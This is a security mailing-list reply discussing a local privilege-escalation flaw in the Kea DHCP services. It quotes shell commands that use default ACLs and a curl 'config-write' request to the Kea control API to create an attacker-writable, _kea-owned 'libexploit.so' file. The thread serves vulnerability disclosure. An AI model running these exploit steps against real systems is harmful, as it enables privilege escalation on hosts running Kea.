Hi,

On Wed, May 28, 2025 at 08:23:25PM +0200, Jakub Wilk wrote:
> * Matthias Gerstner <mgerst...@suse.de>, 2025-05-28 19:21:
> >By leveraging issue 3.2), the Kea services can be instructed to create 
> >`_kea` owned files in the attacker's `$HOME/.Private`. The content of 
> >the created files is not fully attacker controlled, however, so it will 
> >not be possible to craft a valid ELF object for loading via `dlopen()` 
> >this way. By placing a setgid-directory in `$HOME/.Private/evil-dir`, 
> >any files created in this directory will even have the group-ownership 
> >of the attacker. The file mode will be 0644, however,
> 
> Default ACLs to the rescue!
> 
> $ chmod a+x ~
> $ mkdir -m 777 ~/.Private
> $ setfacl -d -m u:$LOGNAME:rwx ~/.Private/
> $ curl -s -H "Content-Type: application/json" -d '{ "command": 
> "config-write", "arguments": { "filename": "'"$HOME"'/.Private/libexploit.so" 
> } }' localhost:8000 > /dev/null
> $ echo pwned > ~/.Private/libexploit.so
> $ ls -l ~/.Private/libexploit.so
> -rw-rw-rw-+ 1 _kea _kea 6 May 28 18:15 /home/jwilk/.Private/libexploit.so
> $ cat ~/.Private/libexploit.so
> pwned

very nice addition! We already felt like there was little left to
succeed in the attack, but didn't think of ACLs.

We will make an update to our blog post to reflect this.

Cheers

Matthias

Attachment: signature.asc
Description: PGP signature

Reply via email to